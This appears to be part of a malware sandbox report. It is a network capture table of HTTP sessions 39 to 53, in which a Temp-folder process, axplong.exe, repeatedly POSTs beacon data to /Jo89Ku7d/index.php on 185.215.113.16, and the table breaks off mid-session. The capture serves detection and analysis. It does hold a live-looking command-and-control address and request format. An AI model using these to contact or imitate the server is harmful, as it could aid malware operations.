                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  39 | 192.168.2.6 | 65100 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:46.607590914 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:47.302988052 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:47.304413080 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:47.526633978 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  40 | 192.168.2.6 | 65101 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:47.638288021 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:48.358087063 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:48.359149933 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:48.590025902 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  41 | 192.168.2.6 | 65102 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:48.701088905 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:49.401583910 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:49.402457952 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:49.627460003 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  42 | 192.168.2.6 | 65103 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:49.747351885 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:50.440229893 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:50.441426039 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:50.666389942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  43 | 192.168.2.6 | 65104 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:50.778734922 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:51.484373093 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:51.485218048 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:51.711504936 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  44 | 192.168.2.6 | 65105 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:51.828345060 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:52.535466909 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:52.538497925 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:52.761044979 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  45 | 192.168.2.6 | 65106 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:52.872567892 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:53.608582020 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:53.610451937 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:53.848117113 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  46 | 192.168.2.6 | 65107 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:53.967271090 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:54.678500891 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:54.679599047 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:54.906187057 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  47 | 192.168.2.6 | 65108 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:55.012929916 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:55.739972115 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:55.740757942 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:55.973352909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  48 | 192.168.2.6 | 65109 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:56.091054916 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:56.797980070 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:56.798801899 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:57.027661085 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  49 | 192.168.2.6 | 65110 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:57.140134096 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:57.875601053 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:57.876549959 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:58.112724066 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  50 | 192.168.2.6 | 65111 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:58.231508017 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:58.930130959 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:58.931102037 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:59.155163050 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  51 | 192.168.2.6 | 65113 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:59.262922049 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:59.971185923 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:59.972007036 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:00.200732946 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  52 | 192.168.2.6 | 65114 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:00.310723066 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:01.000776052 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:01.001719952 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:01.223706961 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  53 | 192.168.2.6 | 65115 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:01.343229055 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:02.053611040 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
